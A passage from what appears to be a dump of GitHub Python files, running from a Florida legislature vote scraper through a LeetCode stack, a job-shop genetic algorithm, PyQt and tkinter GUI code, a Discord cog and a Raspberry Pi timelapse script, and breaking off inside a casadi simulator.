\"Nays To Yeas\":\n\t\t\t\tchange = \"Y\"\n\t\t\telif row.td.span.getText() == \"Nays\" or row.td.span.getText() == \"Yeas To Nays\":\n\t\t\t\tchange = \"N\"\n\t\telif row.attrs['colspan'] == \"3\":\n\t\t\tnameVotes[row.td.getText().strip()] = change\n\n\ttime.sleep(2) # Being courteous\n\treturn nameVotes\n\ndef returnEmptyVote(cameralType):\n\ttry:\n\t\tconn = pymysql.connect(host='127.0.0.1', unix_socket='/Applications/XAMPP/xamppfiles/var/mysql/mysql.sock', user='root', passwd=None, db='flbilltrack', charset='utf8')\n\t\tcur = conn.cursor()\n\t\tcur.execute(\"USE flbilltrack\")\n\t\tcur.execute(\"SELECT lname FROM %s\" % (cameralType))\n\t\tcur.connection.commit()\n\t\tcongressmen = cur.fetchall()\n\t\toutput = {}\n\t\tfor congressman in congressmen:\n\t\t\toutput[congressman[0]] = \"none\"\n\tfinally:\n\t\tcur.close()\n\t\tconn.close()\n\n\treturn output\n\ndef getBillInfo(url):\n\thtml = urlopen(url)\n\tbsObj = BeautifulSoup(html, \"html.parser\")\n\n\t# Get the bill number/name\n\theading = bsObj.find(\"h1\", {\"class\":\"ribbonbilldetail\"}).getText()\n\tnumber = heading[:heading.index(\"-\")-2].strip()\n\tname = heading[heading.index(\"-\")+1:].strip()\n\n\t# Get the bill summary\n\tsummary = bsObj.find(\"span\", {\"id\":\"lblShortTitle\"}).getText()\n\n\t# Get the full text URL\n\tfullTextURL = \"http://www.myfloridahouse.gov/\" + bsObj.find(\"a\", text=re.compile(\"Enrolled\")).attrs['href']\n\n\t# Get the voting record\n\ttry:\n\t\t# Get the \"Vote History\" table\n\t\tresultsTbl = bsObj.find(\"table\", {\"id\":\"ctl00_ContentPlaceHolder1_ctrlContentBox_ctrlPageContent_ctl00_dgHistory\"})\n\t\tresultsTblLength = len(resultsTbl.tbody.findAll(\"tr\"))\n\n\t\t# Get the heading of the last row\n\t\tlastRowHeading = resultsTbl.tbody.findAll(\"tr\")[resultsTblLength-1].findAll(\"td\")[0].getText().strip()\n\n\t\t# If the last vote was a House vote, get it and work up until a heading not called \"House\" is found, that's the Senate vote row, vice versa.\n\t\tif lastRowHeading == \"House\":\n\t\t\thouseResults = \"http://www.myfloridahouse.gov/\" + resultsTbl.tbody.findAll(\"tr\")[resultsTblLength-1].findAll(\"td\")[6].a.attrs[\"href\"]\n\t\t\ti = resultsTblLength-1\n\t\t\tiRowHeading = resultsTbl.tbody.findAll(\"tr\")[i].findAll(\"td\")[0].getText().strip()\n\t\t\twhile iRowHeading != \"Senate\" and i > 0:\n\t\t\t\ti -= 1\n\t\t\t\tiRowHeading = resultsTbl.tbody.findAll(\"tr\")[i].findAll(\"td\")[0].getText().strip()\n\t\t\tsenateResults = \"http://www.myfloridahouse.gov/\" + resultsTbl.tbody.findAll(\"tr\")[i].findAll(\"td\")[6].a.attrs[\"href\"]\n\n\t\telif lastRowHeading == \"Senate\":\n\t\t\tsenateResults = \"http://www.myfloridahouse.gov/\" + resultsTbl.tbody.findAll(\"tr\")[resultsTblLength-1].findAll(\"td\")[6].a.attrs[\"href\"]\n\t\t\ti = resultsTblLength-1\n\t\t\tiRowHeading = resultsTbl.tbody.findAll(\"tr\")[i].findAll(\"td\")[0].getText().strip()\n\t\t\twhile iRowHeading != \"House\" and i > 0:\n\t\t\t\ti -= 1\n\t\t\t\tiRowHeading = resultsTbl.tbody.findAll(\"tr\")[i].findAll(\"td\")[0].getText().strip()\n\t\t\t\thouseResults = \"http://www.myfloridahouse.gov/\" + resultsTbl.tbody.findAll(\"tr\")[i].findAll(\"td\")[6].a.attrs[\"href\"]\n\n\t\t# Get House Votes\n\t\thouseVotes = getVoteCount(houseResults)\n\n\t\t# Get Senate Votes\n\t\tsenateVotes = getVoteCount(senateResults)\n\n\t# If no \"Vote History\" table was found, return an empty set of votes\n\texcept:\n\t\thouseVotes = returnEmptyVote(\"representatives\")\n\t\tsenateVotes = returnEmptyVote(\"senators\")\n\n\ttime.sleep(2) # Being courteous\n\t\n\treturn {\n\t\t\"url\": url,\n\t\t\"number\": number,\n\t\t\"name\": name,\n\t\t\"summary\": summary,\n\t\t\"fullTextURL\": fullTextURL,\n\t\t\"senateVotes\": senateVotes,\n\t\t\"houseVotes\": houseVotes\n\t}\n\ndef saveToDB(bill):\n\ttry: \n\t\tconn = pymysql.connect(host='127.0.0.1', unix_socket='/Applications/XAMPP/xamppfiles/var/mysql/mysql.sock', user='root', passwd=None, db='flbilltrack', charset='utf8')\n\t\tcur = conn.cursor()\n\t\tcur.execute(\"USE flbilltrack\")\n\n\t\tprint(\"Number: %r\\n Name: %r\\n Summary: %r\\n fullTextURL: %r\\n URL: %r\" % (bill['number'], bill['name'], bill['summary'], bill['fullTextURL'], bill['url']))\n\t\tcur.execute(\"INSERT INTO bills(number,name,summary,fullTextURL,url) VALUES(%s,%s,%s,%s,%s)\", (bill['number'], bill['name'], bill['summary'], bill['fullTextURL'], bill['url']))\n\t\tcur.connection.commit()\n\n\t\tcur.execute(\"SELECT id FROM bills ORDER BY ID DESC LIMIT 1\")\n\t\tcur.connection.commit()\n\t\tbillId = str(cur.fetchone()[0])\n\n\t\tfor key, value in sorted(bill[\"houseVotes\"].items()):\n\t\t\tcur.execute(\"INSERT INTO votes(cameral,congressman,billid,vote) VALUES(%s,%s,%s,%s)\", (\"House\", key, billId,value))\n\t\t\tcur.connection.commit()\n\t\t\tprint(\"Cameral: %s, Congressman: %s, Bill Id: %s, Vote: %s\" % (\"House\", key, billId, value))\n\n\t\tfor key, value in sorted(bill[\"senateVotes\"].items()):\n\t\t\tprint(\"Cameral: %s, Congressman: %s, Bill Id: %s, Vote: %s\" % (\"Senate\", key, billId, value))\n\t\t\tcur.execute(\"INSERT INTO votes(cameral,congressman,billid,vote) VALUES(%s,%s,%s,%s)\", (\"Senate\", key, billId,value))\n\t\t\tcur.connection.commit()\n\n\t\tcur.close()\n\tfinally:\n\t\tconn.close()\n\n\n# Program Start\nbillLinks = []\n\n# Get to Enrolled Bills\ndriver = webdriver.Firefox()\ndriver.get(\"http://www.myfloridahouse.gov/Sections/Bills/bills.aspx\")\nassert \"Florida\" in driver.title\nselect = Select(driver.find_element_by_name('ddlBillList'))\nselect.select_by_value(\"1\")\nscrollToElement(\"btnShowBills\")\ndriver.find_element_by_id(\"btnShowBills\").click()\n\n# Get all the pages\npageVals = [];\npageNav = driver.find_element_by_name(\"ddlPaging\")\npageLinks = pageNav.find_elements_by_css_selector(\"*\")\nfor pageLink in pageLinks:\n\tpageVals.append(pageLink.get_attribute('value'))\n\n# For each page, get all the bill links\nfor pageVal in pageVals:\n\tselect = Select(driver.find_element_by_name('ddlPaging'))\n\tselect.select_by_value(pageVal)\n\telement = WebDriverWait(driver, 10).until(\n \tEC.presence_of_element_located((By.ID, \"pnlLeavingMyFloridaHouse\"))\n\t)\n\tgetBillLinks()\ndriver.close()\n\n# For each bill, get all the info and save it to a database\nfor billLink in billLinks:\n\tsaveToDB(getBillInfo(billLink))\n","repo_name":"brizandrew/fl-legislature-tracker","sub_path":"FLBillTracker.py","file_name":"FLBillTracker.py","file_ext":"py","file_size_in_byte":7412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25201411080","text":"class CustomStack:\n\n def __init__(self, maxSize: int):\n self.m = maxSize\n self.stack = []\n self.l = 0\n\n def push(self, x: int) -> None:\n if self.l < self.m:\n self.stack.append(x)\n self.l += 1\n\n def pop(self) -> int:\n if self.stack == []:\n return -1\n self.l -= 1\n return self.stack.pop()\n \n\n def increment(self, k: int, val: int) -> None:\n t = 0\n if k < self.l:\n t = k\n else:\n t = self.l\n for i in range(t):\n self.stack[i] += val\n\n\n# Your CustomStack object will be instantiated and called as such:\n# obj = CustomStack(maxSize)\n# obj.push(x)\n# param_2 = obj.pop()\n# obj.increment(k,val)","repo_name":"Atul-Verma-Git/100-days-of-code","sub_path":"design-a-stack-with-increment-operation/design-a-stack-with-increment-operation.py","file_name":"design-a-stack-with-increment-operation.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24494707727","text":"\r\ndef binary(n):\r\n # Create an empty list to store the binary representation\r\n binary_list = []\r\n\r\n # Loop through the number until it is 0\r\n while n > 0:\r\n # Calculate the remainder and append it to the list\r\n remainder = n % 2\r\n binary_list.append(remainder)\r\n\r\n # Update the number\r\n n = n // 2\r\n # Reverse the list\r\n binary_list.reverse()\r\n\r\n # Return the list\r\n return binary_list\r\n\r\nprint(binary(6))","repo_name":"MatthewSalo/NTU-Week-2","sub_path":"Binary_funct.py","file_name":"Binary_funct.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32358376815","text":"import boto3\n\nclient = boto3.client('dynamodb', aws_access_key_id='xxx', aws_secret_access_key='xxx', region_name='us-east-2')\n\n\nresponse = client.put_item(\n TableName='cablegate_document',\n Item={\n 'name':{'S': 'test'} # attention syntaxe articuliere\n }\n)\n\n\n# lien utile\n# https://sysadmins.co.za/experimenting-the-client-interface-for-dynamodb-in-boto3-with-gamescores/\n# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html#DynamoDB.Client.put_item\n","repo_name":"paul-mathieu/cablegate-cia-analysis","sub_path":"2-convert-data/upload/test upload.py","file_name":"test upload.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16007647503","text":"import random\nimport numpy as np\nimport math\n\nmachNo = 3 # int(input(\"How many machines do you have? \"))\njob = 3 # int(input(\"How many jobs do you have? \"))\ntasks = 3 #int(input(\"How many tasks in each job?\"))\n\ncrRate = 0.8\nmutRate = 0.2\n\nmachines = []\ntimes = []\n\nfor i in range(job):\n curr = []\n currT = []\n for j in range(tasks):\n curr.append(int(input())-1)\n currT.append(int(input()))\n machines.append(curr)\n times.append(currT)\n\nrandArr = tasks * [i for i in range(job)]\n\ndef encode(popSize):\n finPop = []\n\n for _ in range(popSize):\n finPop.append(random.sample(randArr, job*tasks))\n\n return finPop\n\n\ndef fitness(chromosome):\n machT = [0 for _ in range(machNo)]\n jobs = [0 for _ in range(tasks)]\n\n started = []\n\n for _ in range(job):\n arr = []\n for _ in range(tasks):\n arr.append(0)\n started.append(arr)\n\n for i in chromosome:\n machine = machines[i][jobs[i]]\n time = times[i][jobs[i]]\n prevTime = times[i][jobs[i]-1]\n if jobs[i] != 0:\n if (machT[machine] > started[i][jobs[i]-1]+prevTime):\n started[i][jobs[i]] = machT[machine]\n machT[machine] += time\n else:\n started[i][jobs[i]] = started[i][jobs[i]-1]+prevTime\n machT[machine] = started[i][jobs[i]] + time\n else:\n started[i][jobs[i]] = machT[machine]\n machT[machine] += time\n\n jobs[i] += 1\n\n makespan = max(machT)\n\n return makespan\n\n\ndef rouletteWheel (pop, fitnesses):\n invSm = sum([1/k for k in fitnesses])\n probs = [(1/k)/invSm for k in fitnesses]\n \n chc = np.random.choice(range(len(pop)), p=probs)\n return pop[chc]\n\n\ndef crossover (par1, par2):\n child1 = list(par1)\n child2 = list(par2)\n\n randm = random.randint(0, len(child1))\n\n if (random.random() <= crRate):\n child1[randm::], child2[randm::] = child2[randm::], child1[randm::]\n\n return child1, child2\n\n\ndef fixCrossover (child):\n counts = [0 for _ in range(machNo)]\n\n for i in child:\n counts[i] += 1\n\n more = []\n less = []\n\n for i in range(machNo):\n if counts[i] > machNo:\n more.append([i, counts[i] - machNo])\n elif counts[i] < machNo:\n less.append([i, machNo - counts[i]])\n\n for i in more:\n while i[1] > 0:\n currInd = child.index(i[0])\n currLess = less[0]\n child[currInd] = currLess[0]\n less[0][1] -= 1\n if (less[0][1] == 0):\n less.pop(0)\n i[1] -= 1\n\n return child\n\n\ndef mutation (child):\n\n if (random.random() <= mutRate):\n ind1 = random.randint(0, len(child)-1)\n ind2 = random.randint(0, len(child)-1)\n\n child[ind1], child[ind2] = child[ind2], child[ind1]\n \n return child\n\n# SA\n\ndef metropolis (oldF, newF, tmp):\n return math.exp(-abs(newF - oldF) / tmp)\n\n\ndef perturb (old):\n f = random.randint(0, len(old)-1)\n s = random.randint(f, len(old)-1)\n\n annealed = list(old)\n annealed[f:s] = reversed(annealed[f:s])\n\n return annealed\n\n\ndef accept (newF, oldF, tmp):\n if (newF < oldF):\n return True\n else:\n if (random.random() < metropolis(oldF, newF, tmp)):\n return True\n else: return False\n\n\ndef simulated (currSol):\n temp = 100\n stopTemp = 0.00001\n\n rate = 0.9995\n iters = 50\n\n sols = []\n\n for _ in range (iters):\n if (temp > stopTemp):\n\n sols.append(currSol)\n \n neighbour = perturb(currSol)\n if accept(fitness(currSol), fitness(neighbour), temp):\n currSol = neighbour\n\n temp *= rate\n\n return currSol\n\n# Driver Code\n\npopSize = 30\n\n# Generate Population\ngenome = encode(popSize)\n\n# Recording the best makespan\nbests = []\n\nfor _ in range(30):\n\n # Calculate Fitness\n fitnesses = []\n\n for i in genome:\n fitnesses.append(fitness(i))\n\n #for i in genome:\n # print (i)\n\n #print(\"change\")\n\n bests.append(min(fitnesses))\n\n # Selection\n selected = [rouletteWheel(genome, fitnesses) for _ in range(popSize)]\n\n # Crossover and Mutation\n\n childPop = []\n\n for i in range(0, popSize, 2):\n par1 = selected[i]\n par2 = selected[i+1]\n\n children = crossover(par1, par2)\n child1 = mutation(fixCrossover(children[0]))\n child2 = mutation(fixCrossover(children[1]))\n\n childPop.append(child1)\n childPop.append(child2)\n\n arr = [(fitness(childPop[i]), i) for i in range(popSize)]\n arr = sorted(arr, reverse=True)\n\n genome = []\n\n for j in range(popSize):\n if j <= popSize//2:\n genome.append(simulated(childPop[arr[j][1]]))\n else:\n genome.append(childPop[arr[j][1]])\n\n\nfor i in range(len(bests)):\n print (\"Best Makespan for Generation\", i, \"is:\", bests[i])\n\n","repo_name":"pi34/Metaheuristics-JSS","sub_path":"GASA.py","file_name":"GASA.py","file_ext":"py","file_size_in_byte":4912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41504185672","text":"from PyQt5 import QtWidgets, Qt, QtCore, QtGui\n\nclass DockLayout(QtWidgets.QVBoxLayout):\n\n\tdef __init__(self, window, parent):\n\t\tsuper().__init__(parent)\n\t\tself.window = window\n\t\tself.setSpacing(10)\n\t\tself.setAlignment(QtCore.Qt.AlignCenter)\n\n\t\tself.home_button= QtWidgets.QPushButton()\n\t\tself.home_image = QtGui.QPixmap('../home.svg').scaled(40, 40)\n\t\tself.home_button.setIcon(QtGui.QIcon(self.home_image))\n\t\tself.home_button.setFixedSize(40, 40)\n\t\tself.home_button.setStyleSheet('QPushButton { background-color: #f98d58; color: white; border: 2px solid #ffffff; border-radius: 5px; padding: 5px 10px; }')\n\t\tself.home_button.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n\t\tself.home_button.clicked.connect(lambda: self.window.swap_screen(\"home\"))\n\n\t\tself.lesson_button= QtWidgets.QPushButton()\n\t\tself.lesson_image = QtGui.QPixmap('../lesson.svg').scaled(40, 40)\n\t\tself.lesson_button.setIcon(QtGui.QIcon(self.lesson_image))\n\t\tself.lesson_button.setFixedSize(40, 40)\n\t\tself.lesson_button.setStyleSheet('QPushButton { background-color: #f98d58; color: white; border: 2px solid #ffffff; border-radius: 5px; padding: 5px 10px; }')\n\t\tself.lesson_button.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n\t\tself.lesson_button.clicked.connect(lambda: self.window.swap_screen(\"lesson\"))\n\n\t\tself.notes_button= QtWidgets.QPushButton()\n\t\tself.notes_image = QtGui.QPixmap('../notes.svg').scaled(40, 40)\n\t\tself.notes_button.setIcon(QtGui.QIcon(self.notes_image))\n\t\tself.notes_button.setFixedSize(40, 40)\n\t\tself.notes_button.setStyleSheet('QPushButton { background-color: #f98d58; color: white; border: 2px solid #ffffff; border-radius: 5px; padding: 5px 10px; }')\n\t\tself.notes_button.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n\t\tself.notes_button.clicked.connect(lambda: self.window.swap_screen(\"notes\"))\n\n\t\tself.close_button= QtWidgets.QPushButton()\n\t\tself.close_image = QtGui.QPixmap('../close.svg').scaled(40, 40)\n\t\tself.close_button.setIcon(QtGui.QIcon(self.close_image))\n\t\tself.close_button.setFixedSize(40, 40)\n\t\tself.close_button.setStyleSheet('QPushButton { background-color: #f98d58; color: white; border: 2px solid #ffffff; border-radius: 5px; padding: 5px 10px; }')\n\t\tself.close_button.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n\t\tself.close_button.clicked.connect(self.window.close)\n\n\t\tself.addWidget(self.home_button, alignment=QtCore.Qt.AlignCenter)\n\t\tself.addWidget(self.lesson_button, alignment=QtCore.Qt.AlignCenter)\n\t\tself.addWidget(self.notes_button, alignment=QtCore.Qt.AlignCenter)\n\t\tself.addWidget(self.close_button, alignment=QtCore.Qt.AlignCenter)\n","repo_name":"DontChewOnChewie/Final-Year-Project---Automatic-Virtualised-Learning-Tool","sub_path":"App/VM_Shared/App/screens/dock/dockLayout.py","file_name":"dockLayout.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3688034022","text":"x=input('Enter a whole number less than 100 to get its factoria\\n')\r\nx=int(x)\r\nn=x\r\n\r\nif x<100 and x>1 :\r\n while(n>1):\r\n x= x * (n - 1)\r\n n=n-1\r\n\r\nelif x==1:\r\n x=1\r\nelif x==0:\r\n x=0\r\nelse:\r\n print('number must be a whole number and must be less than 100')\r\n\r\n\r\nprint(x)","repo_name":"Psami-wondah/Documents","sub_path":"Factoria of numbers less than 100.py","file_name":"Factoria of numbers less than 100.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25615068519","text":"import discord\nfrom discord.ext import commands\nfrom discord.utils import get\n\nclass c120(commands.Cog, name=\"c120\"):\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n @commands.command(name='Spring\\'s_Herald', aliases=['c120'])\n async def example_embed(self, ctx):\n embed = discord.Embed(title='Spring\\'s Herald',\n color=0x00008B)\n embed.set_thumbnail(url='https://www.duelingbook.com/images/custom-pics/2300000/2328211.jpg')\n\n embed.add_field(name='Status (Archetype)', value='Casual:3/Tournament:3', inline=True)\n embed.add_field(name='Type (Attribute)', value='Fairy/Link/Effect (EARTH)', inline=False)\n embed.add_field(name='Link Rating (ATK/Link Arrows)', value='2 (500/⬆️⬇️)', inline=False)\n embed.add_field(name='Monster Effect', value='2 Effect Monsters\\nYou can banish 1 monster that this card points to until your next Standby Phase. You can target 3 of your banished monsters or 3 of your opponent\\'s banished monsters; shuffle them into the Deck, and if you do, draw 1 card. You can only use each effect of \"Spring\\'s Herald\" once per turn.', inline=False)\n embed.set_footer(text='Set Code: ANCF')\n\n await ctx.send(embed=embed)\n\ndef setup(bot: commands.Bot):\n bot.add_cog(c120(bot))","repo_name":"ProfessorSean/Kasutamaiza","sub_path":"upcfcardsearch/c120.py","file_name":"c120.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71135747946","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import font\nfrom tkinter import filedialog, messagebox, Toplevel, Frame, Scrollbar\n\n# import tkinter.scrolledtext\nfrom tkinter import scrolledtext as st\nfrom tkinter import *\nimport tkinter.colorchooser\nimport os, pathlib\nimport pyautogui as pg\nimport pyperclip as pc\nimport glob\nimport time\n\n\n\n\n\nclass Coder(object):\n ecount = 1\n btncount = 1\n btncount2 = 1\n labelcount = 1\n canvascount = 1\n lboxcount = 1\n rowcount = 1\n columncount = 1\n combocount = 1\n spincount = 1\n textcount = 1\n slidercount = 1\n scrollcount = 1\n projectcount = 1\n def __init__(self,parent):\n self.parent = parent\n self.top = Toplevel()\n self.frm1 = ttk.Frame(self.parent, width=800, height=150)\n self.frm1.grid(row=1, column=1)\n self.txt = st.ScrolledText(self.top, height=50, width=100, bg='white',bd=15)\n self.txt.grid(row=10, column=0,sticky=\"nsew\")\n self.btn1 = tk.Button(self.frm1, text=\"imports\", bg=\"orange\", bd=5,command=self.qukimp)\n self.btn1.grid(row=5, column=1)\n self.btn2 = tk.Button(self.frm1, text=\"Entry\", bg=\"orange\",bd =5, command=self.e_code)\n self.btn2.grid(row=6, column=1)\n self.btn3 = tk.Button(self.frm1, text=\"Button Code1\", bg=\"orange\", command=self.button_code)\n self.btn3.grid(row=7, column=1)\n self.btn4 = tk.Button(self.frm1, text=\"Button code2\", bg=\"orange\", command=self.button_code2)\n self.btn4.grid(row=8, column=1)\n## self.btn5 = tk.Button(self.frm1, text=\"ctlr alt t\", bg=\"violet\", command=pg4)\n## self.btn5.grid(row=9, column=1)\n## self.btn6 = tk.Button(self.frm1, text=\"terminal\", bg=\"orange\", command=pg5)\n## self.btn6.grid(row=10, column=1)\n## self.btn7 = tk.Button(self.frm1, text=\"open app\", bg=\"orange\", command=pg6)\n## self.btn7.grid(row=11, column=1)\n## self.btn8 = tk.Button(self.frm1, text=\"alt F4 close\", bg=\"orange\", command=pg7)\n## self.btn8.grid(row=12, column=1)\n## self.btn9 = tk.Button(self.frm1, text=\"pg.moveTo\", bg=\"light blue\", command=pg8)\n## self.btn9.grid(row=13, column=1)\n## self.btn10 = tk.Button(self.frm1, text=\"apt udate\", bg=\"orange\", command=pg9)\n## self.btn10.grid(row=14, column=1)\n## self.btn11 = tk.Button(self.frm1, text=\"self.btn1\", bg=\"orange\", command=pg10)\n## self.btn11.grid(row=15, column=1)\n## self.btn12 = tk.Button(self.frm1, text=\"self.btn1\", bg=\"orange\", command=pg11)\n## self.btn12.grid(row=16, column=1)\n## self.btn13 = tk.Button(self.frm1, text=\"self.btn1\", bg=\"orange\", command=pg12)\n## self.btn13.grid(row=17, column=1)\n##\n##\n\n\n\n\n\n def qukimp(self):\n qpo = (\n \"\"\"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import font\nfrom tkinter import filedialog, messagebox, Toplevel, Frame\nfrom tkinter import *\nimport os, pathlib\nimport pyautogui as pg\nimport pyperclip as pc\nimport glob\nimport time\"\"\"\n + \"\\n\"\n )\n self.txt.insert(tk.END, qpo)\n\n\n def e_code(self):\n \n w_str = (\n \"\"\" self.var = tk.StringVar(self)\n self.e1 = tk.Entry(self, self.textvariable=self.var, bg='snow')\n self.e1.grid(row=3, column=4)\"\"\"\n + \"\\n\"\n )\n w_str2 = w_str.replace(\"self.var1\", \"self.var\" + str(self.ecount))\n w_str3 = w_str2.replace(\"self.e1\", \"self.e\" + str(self.ecount))\n w_str4 = w_str3.replace(\"row=3\", \"row=\" + str(self.rowcount))\n self.txt.insert(tk.END, w_str4)\n self.ecount += 1\n self.rowcount += 1\n\n def button_code(self):\n \n w_str = (\n \"\"\" self.b1 = tk.Button(root,relief=tk.FLAT, compound=tk.LEFT,text=\"new\",command=None)\n self.b1.grid(row=1, column=2)\"\"\"\n + \"\\n\"\n )\n w_str2 = w_str.replace(\"b1\", \"b\" + str(self.btncount))\n w_str3 = w_str2.replace(\"row=1\", \"row=\" + str(self.rowcount))\n self.txt.insert(tk.END, w_str3)\n self.btncount += 1\n self.rowcount += 1\n\n def button_code2(self):\n \n w_str = (\n \"\"\" self.btn1 = tk.Button(self,\n relief=tk.FLAT,\n compound=tk.LEFT,\n self.text=\"new\",\n command=None,\n\n )\nself.btn1.grid(row=2, column=1)\"\"\"\n + \"\\n\"\n )\n w_str2 = w_str.replace(\"self.btn1\", \"self.btn\" + str(self.btncount2))\n w_str3 = w_str2.replace(\"column=1\", \"column=\" + str(self.columncount))\n self.txt.insert(tk.END, w_str3)\n self.btncount2 += 1\n self.columncount += 1\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nclass App(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n c = Coder(self)\n\nif __name__ == \"__main__\":\n app=App()\n app.mainloop()\n","repo_name":"growcacti/button-coder-project","sub_path":"btn_coder_OOP op.py","file_name":"btn_coder_OOP op.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43457459294","text":"secret_number = 8\nattempts = 0\nguess_limit = 3\n\nwhile attempts < guess_limit:\n guess = int(input('Guess a number: '))\n attempts += 1\n if guess == secret_number:\n print(\"Well done !\")\n break\nelse:\n print(\"Sorry you failed !\")\n","repo_name":"mehdi-ahmed/python-introduction","sub_path":"assignments/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6523565548","text":"import database\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport sys\n\n\ndef plot_day(start_date):\n # database\n db = database.Database()\n\n # retrieve x and y values\n x, y = db.get_data(start_date, 'txs_hour')\n\n # plot labels appearance\n plt.plot(x, y)\n plt.xlabel('time in [UTC]')\n plt.ylabel('transactions/hour')\n plt.grid()\n\n # Set x axis to hours %H:%M\n hours = mdates.HourLocator()\n t_fmt = mdates.DateFormatter('%H:%M')\n plt.gca().xaxis.set_major_locator(hours)\n plt.gca().xaxis.set_major_formatter(t_fmt)\n plt.xlim([x[0], x[len(x)-1]])\n plt.xticks(rotation=45)\n plt.tight_layout()\n\n # Show and save plot\n plt.show()\n plt.savefig('myfig')\n\n\nif __name__ == '__main__':\n try:\n date = sys.argv[1]\n plot_day(date)\n except Exception as e:\n print(e)\n print('Requires 1 agrument: ')\n print('Example: python plot.py 2018-07-06')\n","repo_name":"amosbastian/steempy-tutorials","sub_path":"part_27/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"30078246738","text":"# coding:utf8\nimport torch\nfrom torch.utils import data\nimport numpy as np\nimport h5py\n\n\ndef create_collate_fn(pad_index, max_seq_len):\n def collate_fn(dataset):\n ground_truth = {}\n tmp = []\n for fn, caps, fc_feat, att_feat in dataset:\n ground_truth[fn] = [c[:max_seq_len] for c in caps]\n for cap in caps:\n tmp.append([fn, cap, fc_feat, att_feat])\n dataset = tmp\n dataset.sort(key=lambda p: len(p[1]), reverse=True)\n fns, caps, fc_feats, att_feats = zip(*dataset)\n fc_feats = torch.FloatTensor(np.array(fc_feats))\n att_feats = torch.FloatTensor(np.array(att_feats))\n\n lengths = [min(len(c), max_seq_len) for c in caps]\n caps_tensor = torch.LongTensor(len(caps), max(lengths)).fill_(pad_index)\n for i, c in enumerate(caps):\n end_cap = lengths[i]\n caps_tensor[i, :end_cap] = torch.LongTensor(c[:end_cap])\n lengths = [l-1 for l in lengths]\n return fns, fc_feats, att_feats, (caps_tensor, lengths), ground_truth\n\n return collate_fn\n\n\nclass CaptionDataset(data.Dataset):\n def __init__(self, fc_feats, att_feats, img_captions):\n self.fc_feats = fc_feats\n self.att_feats = att_feats\n self.captions = list(img_captions.items())\n\n def __getitem__(self, index):\n fn, caps = self.captions[index]\n f_fc = h5py.File(self.fc_feats, 'r')\n f_att = h5py.File(self.att_feats, 'r')\n fc_feat = f_fc[fn][:]\n att_feat = f_att[fn][:]\n return fn, caps, np.array(fc_feat), np.array(att_feat)\n\n def __len__(self):\n return len(self.captions)\n\n\ndef get_dataloader(fc_feats, att_feats, img_captions, pad_index, max_seq_len, batch_size, num_workers=0, shuffle=True):\n dataset = CaptionDataset(fc_feats, att_feats, img_captions)\n dataloader = data.DataLoader(dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=create_collate_fn(pad_index, max_seq_len + 1))\n return dataloader\n","repo_name":"ezeli/BUTD_model","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"37"} +{"seq_id":"28128335516","text":"# https://www.raspberrypi.org/learning/getting-started-with-picamera/worksheet/\n\nfrom picamera import PiCamera\nfrom time import sleep, time\nimport datetime\n\nFREQUENCY = 30 # timelapse frequency, in seconds\nFOLDER = \"/home/pi/photos\" # Folder to store photos\n\ncamera = PiCamera()\n# Suggested settings\ncamera.resolution = (3032, 2008) # 6mpx\ncamera.resolution = (2560, 1920) #5mpx\ncamera.framerate = 15\n\ncamera.start_preview()\nsleep(2) # Sleep 2 additional seconds to give time to start\n\nwhile True:\n # Sample: A picture will be saved in $FOLDER/picture17-03-18_17:34.jpg\n timestamp = datetime.datetime.now().strftime('%y-%m-%d_%H:%M:%S')\n picture = '{}/picture{}.jpg'.format(FOLDER,timestamp)\n print(\"Take picture {}\".format(picture))\n camera.capture(picture)\n sleep(FREQUENCY)\n\ncamera.stop_preview()\n","repo_name":"rephus/wearable-camera","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18618615234","text":"# import numpy as np\nfrom casadi import *\nimport do_mpc\n\ndef aircraft_simulator(model, delta_t):\n simulator = do_mpc.simulator.Simulator(model)\n simulator.set_param(t_step = delta_t)\n simulator.setup()\n\n return 